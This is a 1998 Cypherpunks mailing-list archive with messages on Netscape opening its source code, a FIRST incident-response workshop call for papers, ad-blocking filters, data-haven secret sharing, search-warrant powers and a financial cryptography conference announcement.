Message-ID: <E0xvVff-0003c1-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



root wrote on 1998-01-23 01:29 UTC:
> [Press Releases]
> http://www.netscape.com/newsref/pr/newsrelease558.html?cp=nws01flh1
> 
> NETSCAPE ANNOUNCES PLANS TO MAKE NEXT-GENERATION COMMUNICATOR SOURCE CODE
> AVAILABLE FREE ON THE NET

Excellent!

Finally mainstream software companies start to understand that security
critical software has to be provided to the customer in full compilable
source code to allow independent security evaluation.

No formal CC/ITSEC evaluation process can beat the scrutiny of the
Internet crowd.  I wonder how long we have to wait for the day on which
we can download the latest GPL'ed Windows NT version source code from
Microsoft's web server ...

Markus

-- 
Markus G. Kuhn, Security Group, Computer Lab, Cambridge University, UK
email: mkuhn at acm.org,  home page: <http://www.cl.cam.ac.uk/~mgk25/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 23 Jan 1998 13:12:31 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: 10th FIRST
Message-ID: <199801230522.AAA07920@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-------------------------------------------------------------------------
The following message is forwarded to you by "William H. Geiger III"
<whgiii@invweb.net> (listed as the From user of this message).  The
original sender (see the header, below) was Vicente Garcia
<vggarcia@campus.mty.itesm.mx> and has been set as the "Reply-To" field of
this message.
-------------------------------------------------------------------------
>From: Vicente Garcia <vggarcia@campus.mty.itesm.mx>
>Newsgroups: comp.security.pgp.resources
>Subject: 10th FIRST
>Date: Tue, 20 Jan 1998 18:38:39 -0600
>Organization: ITESM Campus Monterrey . DINF-DTCI
>Lines: 371
>Message-ID: <34C5438D.F8F99029@campus.mty.itesm.mx>
>NNTP-Posting-Host: vangelis.mty.itesm.mx
>Mime-Version: 1.0
>Content-Type: text/plain; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>X-Trace: news.mty.itesm.mx 885343029 6704 (None) 131.178.17.111
>X-Complaints-To: news@news.mty.itesm.mx
>X-Mailer: Mozilla 4.01 [en] (Win95; I)
>X-Priority: 3 (Normal)
>Path: edison.dotstar.net!pull-feed.internetmci.com!opus.ies-energy.com!news.cs.utwente.nl!cosy.sbg.ac.at!wuff.mayn.de!Cabal.CESspool!bofh.vszbr.cz!cpk-news-hub1.bbnplanet.com!news.bbnplanet.com!cs.utexas.edu!news.uh.edu!news.mty.itesm.mx!not-for-mail



-----BEGIN PGP SIGNED MESSAGE-----


        *************************************************************
        *                                                           *
        *   Forum of Incident Response and Security Teams (FIRST)   *
        *                                                           *
        * Tenth Annual Computer Security Incident Handling Workshop *
        *                                                           *
        *                     Monterrey, Mexico                     *
        *                                                           *
        *   Monday 22-Jun-1998 to Friday 26-Jun-1998 (inclusive)    *
        *                                                           *
        *************************************************************


                         C A L L   F O R   P A P E R S

                    Submission Deadline:  January 15, 1998

           "The challenges of incident handling in a diverse world"


The Forum of Incident Response and Security Teams (FIRST) was formed in
November 1990 to address the problem of an ever increasing number of
computer and network security related incidents, affecting thousands of
systems around the world. The forum is made up of government, private and
academic Computer Security Incident Response Teams from around the world.
Its primary goal is to coordinate the efforts of its members in order to

increase both their individual and collective effectiveness.

The annual Incident Handling Workshop is part of FIRST's ongoing
educational
program, which is aimed at increasing the general awareness of security
issues and improving expertise when handling computer security incidents.

Specific security problems can affect many individuals and organizations

around the world, possibly involving many different technological
environments. Each of the parties involved must tailor its actions to the
context in which the problem is experienced. Factors which must be taken

into account include:

 * Cultural: The way in which a problem is tackled can be highly
influenced
   by the historical development of the community in question. Examples
   are the ability for open communication about problems or values
regarding
   privacy.

 * Professional: Today the Internet is open to the masses. The ease of
   communication, the advent of electronic commerce, and the
availability of
   information, makes it a playground and a library for the masses. It is
   also a key business tool which professionals depend upon.

 * Political: Political decisions of individual countries concerning key

   areas of computer security, e.g. restrictions in the use and export of
   cryptological technology, may change the way that security problems
   must be approached. Legalities pertaining to diverse use of computer
   systems vary widely between countries.

 * Technological: Different technologies, covering a wide spectrum that
   includes mainframes, unix workstations, personal computers and network
   computers are connected to the same network simultaneously.


Who should attend?
__________________

All those responsible for any aspect of computer security management will
benefit from attending this workshop. This includes both members and
non-members of FIRST, law enforcement officials, computer security
incident
response teams, as well as consultants, contractors, vendors and
individuals
involved in the use, maintenance or planning of computer systems.


Why attend?
___________

The character of the Internet is changing rapidly. Not only has the
commercial community discovered new possibilities offered by "direct"
marketing and advertisement. Governmental and non-academic organizations

have also turned their attentions to the potential of the Internet.
Incident Handling must adapt to the changing user base of the Internet.

In addition to the opportunity for those involved in computer security to
get together and discuss all aspects of the subject, the workshop will
provide the opportunity to listen to experts in the fields of computer
security incident response and vulnerability analysis. They will share
their
valuable expertise by speaking about their experience in dealing
successfully
with the coordination of incidents traversing international boundaries,
highlighting particular problems where appropriate.
There is no other workshop dedicated to this topic in the world.


Important Dates:
________________

Abstract/Proposals Due:              January  15, 1998
Authors Notified:                    February 10, 1998
Full Materials for Proceedings Due:  April     1, 1998


Format of the workshop:
_______________________

The first day is allocated for parallel tutorial style presentations. The
remaining four days will consist of conference paper and workshop style
presentations, as well as FIRST business sessions. One evening is
allocated
for participants to hold events devoted to subjects of particular interest
("birds of a feather" sessions).

All events will be selected to further the objectives of FIRST and its
members. They may involve topics such as computer security incident
handling,
team and incident response coordination, tools, international issues, or

work in progress.

A list of example topics can be found at the end of this announcement.
Contributions should follow the following guidelines:

Tutorials:      Half or full day tutorial proposals will be considered.

Papers:         Written papers may be as long as desired, but
presentations
                must be limited to 30 minutes.

Workshop:       These informal sessions should either follow a more
                "hands-on" approach or provide for a high degree of
                audience participation. They should be tailored to address
                specific issues and should be from 60 to 90 minutes
                in duration. Panel Sessions on a particular topic are
                acceptable.


Submission information:
_______________________

Submissions should include an abstract, proposed length and single page of
notes describing the content and style of the presentation. Special
audio/visual requirements (other than one microphone and one overhead
projector) should be described. Panel session proposals should include a
list of panelists who have agreed to participate. Submissions should be
sent to the contact address given at the end of this document. The
preferred submission mechanism is via electronic mail in ASCII, HTML or
PostScript formats. Submissions via Facsimile transmission or the postal
service will, however, be accepted. Submissions must be received by the
January 15, 1998. Submissions received after this date may not be
considered for inclusion in the program.

Please use the appended form for your submissions.

Authors will be notified by the February 10, 1998 of the status of their

presentation (accepted/rejected). The final version of the material used

for the presentation (overheads, papers, slides) must be delivered to the
organizers by the April 1, 1998 for inclusion in the proceedings.


Email:
______

Please use the email address first-pc98@first.org for submissions or
questions regarding the call for papers.


WWW:
____

The Workshop WWW page is accessible from the FIRST webserver:

        http://www.first.org/workshops/1998/


Program Committee:
__________________

Wolfgang Ley, DFN-CERT, Germany (Program Chair)
Brian Dunphy, ASSIST, USA
Eric A. Fisch, Trident Data Systems, USA
Eric Halil, AUSCERT, Australia
Stephen Hansen, Stanford University, USA
Ahmet Koltuksuz, IZMIR Inst. of Technology, Turkey
Sherman O. Loges, Boeing, USA
Paul Mauvais, CIAC, USA
Fran Nielsen, NIST, USA
Steve Romig, Ohio State, USA
Roger Safian, Northwestern University, USA
Miguel J. Sanchez, SGI, USA
Sandy Sparks, CIAC, USA
Don Stikvoort, CERT-NL, Netherlands
Wietse Venema, TU Eindhoven, Netherlands
Mark Zajicek, CERT Coordination Center, USA


Conference Location:
____________________

Monterrey, Mexico


Dates:
_____

Mon June 22, 1998 - tutorials (parallel streams)
Tue June 23, 1998 to Fri June 26, 1998 (workshop).


Conference Host:
________________

Instituto Tecnologico y de Estudios Superiores de Monterrey (ITESM),
Mexican CERT (MxCERT). The workshop is sponsored by First.Org Inc.


Contact Information:
____________________

Electronic Mail:        first-pc98@first.org
Postal Address:         Attn:   Wolfgang Ley
                                DFN-CERT
                                Univ. of Hamburg
                                Vogt-Koelln-Str. 30
                                22527 Hamburg
                                Germany
Facsimile:              +49 40 5494 2241
                        Subject: FIRST 1998 Workshop

Example Topics (other topics may be considered):

    Dealing with the increasing diversity in all areas
    International Legal Issues
    Legal and Administrative Issues in Incident Handling
    Coordinating International Incidents
    Incident Handling and the Internet
    Security on Large Networks other than the Internet
    How to Protect an Incident Response Team Site
    Interviewing/Hiring Incident Response Team Staff
    Outsourcing an Incident Response Team
    Vulnerability/Advisory Processes
    New Tools for Incident Handling
    Statistic Tools
    Informational Resources
    Programming Securely
    Preventing Incidents
    Intrusion/Vulnerability Detection Tools
    System/Network Monitoring Tools
    The Changing Nature of the "hack"
    Internet Service Providers and Security
    Vendor Session
    Collecting Evidence


===========================================================================

ABSTRACT / PROPOSAL  SUBMISSION SHEET

FIRST 1998


 Name    __________________________________________________________

 Address __________________________________________________________
         __________________________________________________________
         __________________________________________________________

 Phone   ____________________           Fax _______________________

 E-mail  ____________________           URL _______________________

 Title of Presentation ____________________________________________

 Presentation Type ( please tick one )
        ( ) Paper               ( ) Half-day Tutorial
        ( ) Workshop            ( ) Full-day Tutorial
        ( ) Panel

 Presentation Length (in minutes)  ______

 Presentation Media Requirement (other than one overhead projector and
 a microphone):
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________

 Abstract ( 75-100 words )
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________

 FIRST is granted an non exclusive right to copy and redistribute
 conference material including the submissions of the author(s). This
 includes possible distribution on a conference CD and/or the FIRST
 website.

 Brief Biography ( 50-75 words )
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________
 _____________________________________________________________________




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBNHit6QQmfXmOCknRAQFQQQP6Ao1CYieDoeHK1BFqypC6QjVKXeNLEjY+
jq2HgNBSvxuysHH1fNnqNxMRJSHWyFw+yEJJk3TFXL6tyIOIojbfnzH88crtdMah
yzMYZL+APdTf3JppF8ipeIO8HygwMVt/BuRtW7JUCPvN5b7Vj1jDfc8pqOE786np
eAExY1mgrSk=
=LqxA
-----END PGP SIGNATURE-----



--------------------------------------------------------------------
MR/2 PGP Signature Check  22 Jan 1998 22:58:34
--------------------------------------------------------------------



Key matching expected Key ID 8E0A49D1 not found in file 'pubring.pgp'.

WARNING: Can't find the right public key-- can't check signature
integrity.

--------------------------------------------------------------------
MR/2 PGP Signature Check [Secondary Keyring]  22 Jan 1998 22:58:34
--------------------------------------------------------------------



WARNING: Bad signature, doesn't match file contents!


Bad signature from user "Wolfgang Ley, DFN-CERT <ley@cert.dfn.de>".
Signature made 1997/11/23 22:28 GMT using 1024-bit key, key ID 8E0A49D1


WARNING:  Because this public key is not certified with a trusted
signature, it is not known with high confidence that this public key
actually belongs to: "Wolfgang Ley, DFN-CERT <ley@cert.dfn.de>".

PGPRC=1
PGPRC2=1

-----------------------------------------------------
 -- End of forwarded message
-----------------------------------------------------
-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
---------------------------------------------------------------
 
Tag-O-Matic: The sad thing about Windows bashing is it's all true.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Fri, 23 Jan 1998 15:23:41 +0800
To: Brad Threatt <bradt@ehq.com>
Subject: Re: Why no "Banner Ad Eaters"?
In-Reply-To: <34c704c2.971366@128.2.84.191>
Message-ID: <19980122231624.60180@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, Jan 22, 1998 at 03:19:11PM -0800, Brad Threatt wrote:
> There are several examples people have mentioned here:
> Roxen, junkbuster, etc.
> 
> I happen to use one called WebFilter, a patched CERN httpd
> (http://math-www.uni-paderborn.de/~axel/NoShit) which allows
> program filtering based on URL regexp matching.

In addition to all of the ad blocking software mentioned on that page,
If you're running the Microsoft Proxy Server, I wrote an ISAPI filter DLL
plugin that can be used for blocking ads based URL regexp matching.  See
http://www.eskimo.com/~weidai. 

> Of course, now that Netscape's releasing their source code, what
> would *really* help the practice take off would be integration of 
> one of these systems into Netscape. 
> 
> On the downside, this is sure to trigger an ad Arms Race, with content
> providers melding together content and ads.  Right now, I can view the
> web with almost no ads, but if a million people are filtering ads off a
> site, you can bet there will be countermeasures, and lots of them.  It's
> difficult to imagine the filters winning, without more advanced support
> (for example, cropping images to remove ads, and collaborative filtering
> pools).  But if a million people are using the system, and 0.01% are
> coders committed to making it work, well, you can do a lot with 100
> brains.

It seems to me that blocking ads is no different from blocking porn. All
of the technology being developed for the latter purpose (PICS for
example) will eventually be used for the former. Filtering technology in
general will advance as the net becomes more diverse and people seek to
protect themselves from unwelcome information.

I think the long-term outlook for content providers is pretty bleak. How
do you make a profit when your copyrights are not enforceable and your ads
are easily filtered?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <anon@squirrel.owl.de>
Date: Fri, 23 Jan 1998 07:43:40 +0800
To: cypherpunks@cyberpass.net
Subject: Cybersitter censors code
Message-ID: <19a5852c151be5545b7c5afb0cdbbcbb@squirrel>
MIME-Version: 1.0
Content-Type: text/plain



>>Turns out, someone had inadvertly installed this piece of garbage
>>called CyberSitter, which purports to protect you from nasty internet
>>content. Turns out that it does this by patching the TCP drivers and
>>watching the data flow over EVERY TCP STREAM. Can you spot the offense
>>word in my example? It's "NUDE". Seems that cybersitter doesn't care if
>>there are other characters in between. So it blanks out "nu */ #de"
>>without blanking out the punctuation and line breaks. Very strange and
>>stupid.

Find out who it is and fire his ass for sabotage of the company computer
systems. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 23 Jan 1998 13:48:14 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Killing An Arab (fwd)
Message-ID: <199801230544.XAA13132@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi David,

Forwarded message:

> Date: Fri, 23 Jan 1998 00:38:08 -0500
> From: David Miller <dm0@avana.net>
> Subject: Re: Killing An Arab

> > 1 : a theory that there are no universal essences in reality and that
> > the mind can frame
> > no single concept or image corresponding to any universal or general
> > term

> > 2 : the theory that only individuals and no abstract entities (as
> > essences, classes, or
> > propositions) exist -- compare ESSENTIALISM, REALISM

Both of these are what they purport to prohibit.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 23 Jan 1998 15:59:39 +0800
To: Wei Dai <bradt@ehq.com>
Subject: Re: Why no "Banner Ad Eaters"?
In-Reply-To: <34C7D3EF.632F@ehq.com>
Message-ID: <3.0.5.32.19980122235319.0088ca40@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:16 PM 1/22/98 -0800, Wei Dai wrote:
>It seems to me that blocking ads is no different from blocking porn. All
>of the technology being developed for the latter purpose (PICS for
>example) will eventually be used for the former. 

With both PICS ratings for web pages and the new TV ratings,
somehow the ratings only apply to the program and not the ads.
After all, if each TV commercial had to be separately rated,
people would rapidly develop equipment to autoblock commercials,
and that just wouldn't do.

>I think the long-term outlook for content providers is pretty bleak. How
>do you make a profit when your copyrights are not enforceable and your ads
>are easily filtered?

Unfortunately, you're probably right, though providers and advertisers
who really want their messages to get through will find ways to do it.
The current banners are nice, friendly implementations in that they're
easy to identify and block; newer ones will just be sneakier.
They'll come from the same machine as the real page, or they'll
be embedded in the background images, or the servers will insist on 
not shipping you the pages you want until you've downloaded the banner
(e.g. by putting some of the interesting material into images.)
Sure, it requires some server rewriting, but there's money in it.
Alternatively, they may go to clickthrough payment models - the
web page owner only gets paid when people click on the ad,
though perhaps at a higher rate than current "impressions".
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 23 Jan 1998 16:15:35 +0800
To: "John M" <cypherpunks@toad.com
Subject: Re: How to eliminate liability?
In-Reply-To: <19980123052334.20406.qmail@hotmail.com>
Message-ID: <3.0.5.32.19980123000851.00839a40@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:23 PM 1/22/98 PST, John M wrote:
>There has been considerable discussion recently about datahavens, how no 
>one physical location in meatspace is safe, and how there is no single 
>place on earth that a datahaven could exist that would accept all kinds 
>of information.
>Well, what about spreading the information out?  Something simple like 
> [...] and spread it to several servers.  This way no one server has all 
>the information necessary to recreate the "offending" information and if 
>one server gets "hit" (killed), the information can still be regenerated 
>from the the information and ECC from the other servers.

Secret Sharing is easy, and there are a number of implementations with
useful properties like being able to read the original from K of N parts.*
The problem is how to implement it in ways that protect the server
operators as well as the information providers.  For instance,
the author's client software can do the split and send the shares too
different servers, and make sure the readers know how to find the pieces;
this can even be automated enough to make it convenient.
This not only makes it hard for the Bad Guys to find the pieces,
it makes it impossible for the data haven provider to know what's
being stored there, and even if the site is siezed it doesn't give up
the critical information.  This is a Good Thing, and we've discussed it.

On the other hand, what happens if a Bad Guy wants to entrap the operator,
by planting child pornography, pirated software, and TOP SECRET data
in the data haven, advertising on Usenet and then calling the cops.  
Anybody, including the cops, can retrieve the contraband and bust them.
So what are the alternatives, besides obviously encrypting your disks
so it's harder to determine what's on them besides the plant,
and the ever popular "don't let them find your physical location"?
Perhaps the data haven can do the split and farm the data out to
other data havens - but how do they know the data they're receiving
is really a slice of contraband data instead of Yet Another Plant?
It gets pretty convoluted.

[* You can read about secret sharing in Schneier. ]
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 23 Jan 1998 17:03:37 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Search warrants, was Re: On the LAM--Local Area Mixes (fwd)
In-Reply-To: <199801230244.UAA11653@einstein.ssz.com>
Message-ID: <3.0.5.32.19980123003758.0089c100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:44 PM 1/22/98 -0600, Jim Choate wrote:
>> > Are police considered an extension of the judicial or the executive arm of
>> > the government?
>> In theory, executive.  (That way legislative writes laws, executive
>> decides if they want to enforce them, judicial decides if they're legal or
>> not.. )  In theory, of course..
[..]
>Then how, Constitutionaly speaking, do they have get the responsbility to
>search when it is clearly a judicial responsibility (that is where it is
>in the Constitution) 

Going and doing stuff is an Executive Branch function;
enforcing laws is an Executive Branch function.
Issuing the warrant allowing the police to go search or arrest
someone is a judicial function, and is generally done on request
by the police or prosecutors.  In the case of early-60s New York,
of course, it simply wasn't bothered with.  :-)

>and in cases such as Evans -v- Gore the Supreme Court
>has found that the judicial body can't transfer or relinquish it's
>responsibilities even if it *wants* to?
I'm not familiar with the case - got a pointer?

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 23 Jan 1998 13:44:04 +0800
To: cypherpunks@cyberpass.net
Subject: Financial Cryptography 1998 Press Announcement
Message-ID: <v04003918b0eddce984d0@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



Please pass this along to any member of the press you may know. Or anyone
else you can think of. :-).

Thanks,
Robert Hettinga

-----


For Immediate Release

Press Contacts:
Christopher D. Gerath      Robert Hettinga
Gerath & Associates, Inc.  International Financial Cryptography Association
(978) 264-4707             rah@shipwright.com
chris@gerath.com

Financial Cryptography '98 Conference & Exhibition to Highlight FC
Technology and Use

Second Annual Event is World's Leading FC Showcase

Boston, MA, January 22, 1998 - The International Financial Cryptography
Association (IFCA), today announced the 1998 Financial Cryptography
Conference and Exhibition (FC98), to be held on February 23-27, 1998 on the
island of Anguilla in the British West Indies.

The FC98 Conference

The International Conference on Financial Cryptography is the world's first
and only peer-reviewed conference on financial cryptography. Every year,
the newest research is presented in internet financial transfers,
transaction clearing and network-based financial instruments.  This year,
invited speakers and panel participants include such industry experts as
Dr. David Chaum, holder of several very basic financial cryptography
patents and founder of DigiCash Corporation, and Dr. Ron Rivest, who
invented the first practical public key cryptography system and founder
of RSA Data Security, Inc.

However, the primary focus of the Conference will be the results of
financial cryptography research from experts at AT&T Labs, Bell
Laboratories/Lucent, CyberCash, France Telecom, JavaSoft, Kyushu
University, IBM T.J. Watson Research Center, Microsoft, MIT, Princeton
University, Queensland University, University of Southern California, The
US Naval Research Laboratory, Valicert, Verisign and others.

Last year's Conference, FC97, was the subject of an article in the July,
1997 issue of Wired Magazine, an NHK-Japan television program, and was
covered by the Financial Times, the New York Times, and Institutional
Investor.  Financial cryptography was also the cover story of the Setember
8, 1997 issue of Forbes Magazine.

"Everyone knows business on the Internet is growing, but financial
cryptography and the vanishing cost of individual electronic transactions
will create entirely new forms of business," said Robert Hettinga, IFCA
founder and FC98 General Chairman.  "Simple examples include the possible
replacement of many forms of book-entry financial settlement with digital
bearer versions, and, of course, cash settled electronic auctions for
anything you can send down a wire," Hettinga continued.

The FC98 Conference Proceedings will be available later in the year from
Springer Verlag as part of the Lecture Notes in Computer Science series.
See the selection of papers for the FC98 conference at
<http://www.cwi.nl/conferences/FC98>.

The FC98 Exhibition

The FC98 Exhibition, which runs concurrently with the Conference, serves as
a showcase for the newest financial cryptography products. The
presentations, demonstrations, and panels of FC98 Exhibition Program will
explain what kinds of financial cryptography services and implementations
are available in the market today, while the Exhibition floor will have
booths from many of the top companies using and selling financial
cryptography today.

The FC98 Workshop for IT professionals and Senior Managers

The Financial Cryptography '98 Conference and Exhibition will be followed
by the FC98 Workshop for Senior Managers and IS Professionals, which will
be held the week following the Conference and Exhibition, from March 2-6,
1998, at the same location.

The intensive 40-hour FC98 Workshop gives senior managers and IT
professionals an understanding of the fundamentals of strong cryptography
as applied to financial operations on public networks, along with hands-on
instruction in the integration and implementation of these technologies.

FC98's Affiliations and Sponsorship

Financial Cryptography '98 is held in cooperation with the International
Association for Cryptologic Research.  Sponsoring organizations include RSA
Data Security Inc., <http://www.rsa.com/>; C2NET, Inc., <http://www.c2.net/>;
Hansa Bank & Trust Company Limited, Anguilla, <http://www.hansa.net/>;
Sicherheit und Privat- International Bank; Offshore Information Services,
<http://www.offshore.com.ai/>; and Shipwright Development Corporation,
<http://www.shipwright.com/>.

The FC98 Organizing Committee consists of: Vincent Cate and Robert
Hettinga, General Chairs; Rafael Hirschfeld, Conference Chair; Matthew
Franklin, Conference Co-Chair; Ian Goldberg, Workshop Leader; Lynwood Bell,
Exhibition Steering Committee Chair; and Blanc Weber, Exhibits and
Sponsorship Manager.


Registration and Travel

Registration for FC98 can be done directly on the Internet at
<http://www.fc98.ai/>, by calling (264) 497-3255, faxing (264) 497-2756,
email with PGP encryption to <mailto:vince@offshore.com.ai> or physically
mailing the registration form to 949 Old Ta, The Valley, Anguilla, BWI.
Admission to the Exhibition and Conference requires advance payment of the
$1,000 admission fee.  If you're interested in Exhibition space or becoming
an event sponsor, please email Blanc Weber, <mailto:blancw@cnw.com>.

Air travel to Anguilla is typically done through San Juan or St. Martin.
There are several non-stop flights a day from various European and US
locations.  Connection through to Anguilla can be made through American
Eagle, through LIAT, or in the case of St. Martin, with a short ferry ride
to Anguilla.  Consult a travel agent for details or visit our web page at
<http://www.fc98.ai/>.

 ###

Service marks, trademarks or registered trademarks are property of their
respective owners.

-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 24 Jan 1998 04:13:07 +0800
To: sales&amp;marketingproz@diku.dk
Subject: Re: Certification
Message-ID: <Pine.BSF.3.91.980123005009.5829B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





You seem to have spammed the wrong mailing list. Most of us do not want 
to become certified sales / marketing droids, although we occaisonally 
keep them around the office as pets.

On Wed, 21 Jan 1998 sales&marketingproz@diku.dk wrote:

> 
> 
> "From: Steve Camfield, SME Board of Directors
> 
> 
> It is my privilege to formally invite you to become certified in sales or marketing 
> management.  Certification sends a clear message to your customers and colleagues 
> that you are a true professional and have surpassed the highest standards of education, 
> experience, and knowledge.
> 
> For your convenience, I have placed full certification details and answers to questions 
> you may have at www.selling.org  (see Certification). 
> 
> 
> -------------------------
> SME is the non-profit worldwide association of sales and marketing management.   
> Your address was provided to us by one of our chapters based on meeting attendance,
>  inquiry, or suggestion by a local SME chapter board member but you may ensure removal 
> by pressing the "Remove" option at the bottom of www.selling.org.
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 24 Jan 1998 04:09:17 +0800
To: Nobuki Nakatuji <bd1011@hotmail.com>
Subject: Re: Ultra computer
In-Reply-To: <19980122011204.22624.qmail@hotmail.com>
Message-ID: <Pine.BSF.3.91.980123005324.5829C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




Very useful for playing Quake, may also have cryto application. ;)

On Wed, 21 Jan 1998, Nobuki Nakatuji wrote:

> Ultra computer which NEC had the calculation speed of the world
> maximum of about 1000 times of the super computer to was decided
> to be developed. 
> Ultra computer will be completed in 2001. 
> It has the performance that the calculation which takes 10000 years
> with the personal computer is made of 3, 4 days. 
> 
> 
> 
> ______________________________________________________
> Get Your Private, Free Email at http://www.hotmail.com
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@fountainhead.net>
Date: Fri, 23 Jan 1998 04:28:22 +0800
To: cypherpunks@cyberpass.net (Cypherpunks)
Subject: Netscape 5 will be GPL'ed
Message-ID: <199801230129.BAA02808@fountainhead.net>
MIME-Version: 1.0
Content-Type: text



[Press Releases]
http://www.netscape.com/newsref/pr/newsrelease558.html?cp=nws01flh1

NETSCAPE ANNOUNCES PLANS TO MAKE NEXT-GENERATION COMMUNICATOR SOURCE CODE
AVAILABLE FREE ON THE NET

BOLD MOVE TO HARNESS CREATIVE POWER OF THOUSANDS OF INTERNET DEVELOPERS;
COMPANY MAKES NETSCAPE NAVIGATOR AND COMMUNICATOR 4.0 IMMEDIATELY FREE FOR
ALL USERS, SEEDING MARKET FOR ENTERPRISE AND NETCENTER BUSINESSES

----------------------------------------------------------------------------

MOUNTAIN VIEW, Calif. (January 22, 1998) -- Netscape Communications
Corporation (NASDAQ: NSCP) today announced bold plans to make the source
code for the next generation of its highly popular Netscape Communicator
client software available for free licensing on the Internet. The company
plans to post the source code beginning with the first Netscape Communicator
5.0 developer release, expected by the end of the first quarter of 1998.
This aggressive move will enable Netscape to harness the creative power of
thousands of programmers on the Internet by incorporating their best
enhancements into future versions of Netscape's software. This strategy is
designed to accelerate development and free distribution by Netscape of
future high-quality versions of Netscape Communicator to business customers
and individuals, further seeding the market for Netscape's enterprise
solutions and Netcenter business.

In addition, the company is making its currently available Netscape
Navigator and Communicator Standard Edition 4.0 software products
immediately free for all users. With this action, Netscape makes it easier
than ever for individuals at home, at school or at work to choose the
world's most popular Internet client software as their preferred interface
to the Internet.

"The time is right for us to take the bold action of making our client free
- and we are going even further by committing to post the source code for
free for Communicator 5.0," said Jim Barksdale, Netscape's president and
chief executive officer. "By giving away the source code for future
versions, we can ignite the creative energies of the entire Net community
and fuel unprecedented levels of innovation in the browser market. Our
customers can benefit from world-class technology advancements; the
development community gains access to a whole new market opportunity; and
Netscape's core businesses benefit from the proliferation of the
market-leading client software."

Netscape plans to make Netscape Communicator 5.0 source code available for
modification and redistribution beginning later this quarter with the first
developer release of the product. The company will handle free source
distribution with a license which allows source code modification and
redistribution and provides for free availability of source code versions,
building on the heritage of the GNU Public License (GPL), familiar to
developers on the Net. Netscape intends to create a special Web site service
where all interested parties can download the source code, post their
enhancements, take part in newsgroup discussions, and obtain and share
